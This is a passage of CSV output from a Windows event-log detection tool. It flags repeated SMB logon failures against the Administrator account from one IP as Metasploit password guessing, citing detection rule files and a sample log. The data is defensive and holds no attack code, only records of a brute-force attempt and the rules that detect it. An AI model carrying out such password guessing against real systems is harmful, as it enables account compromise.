Password,User: Administrator : Type: 3 : Workstation: oTlg6cvsz6Z6QpCp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3pTALzqu4Ok6CUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kdGagQIEcvQQMp4n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fVu4reOyQEIkChHO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EJWNS69MmMGLSnHc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nPaR2sBxPPCjxpL0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kJJ9A1EfqM4V2TRv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4dxf59xjpxO3oG17 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6dMI12g4tjSF8PX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZAqN0xPaW4jg2Kjc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: mcnReyIEaqsQfowV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: akOH8Y7XdjOpqTez : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b0HOK1TIqloud7gh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n6uIAK55BmTnA6Bf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZDnn6QmLOJ6KwzKt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: np8KaRJvRqBrGyFL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dxbu69Amr6gWN5Hw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LoZdaFJWNON8Ujnc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q4RSlXgOS7sssCqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2PJprE7olK4pjrx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: jQOAUcWQL32y2gGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nXI0wWwzhHN0uvOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ujGqTzfOhmKgoAjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cFoPtWZ03O3ZZgOC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EyO2VTnpGZLeSIvr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ua69MEWABQ9hsooT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ubPQWn4nQYr3rXr8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xrgATdNqkA44nKqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKwktiUfTWakNx3I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVebPFnWhbZKIANs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: IyV8stIvfXLJQpsn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uStfvm0y0eZrWONH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUwTyUXe8NLG7bCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HQuDp8aZpWDANKMe : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GQKTlzx2gq9ayAtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tCzVponBvb9mbyIr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mSwnrFv90KjN2cqj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QX5TLs2MPkia1cmk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ammLKlG1Q5awQGvN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJ1ijJjPJbF4uFlo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: mZOLnwIzpGz03Yjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xS8U3UQNz6l0LZn0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: no6cftQ5MF1fjZ0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5WHS6jVRnCUH0Rb5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i3oGLwrCJXJOauf6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1sxPrDYV3rr4pGJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Osysh2O2A3A2bN22 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
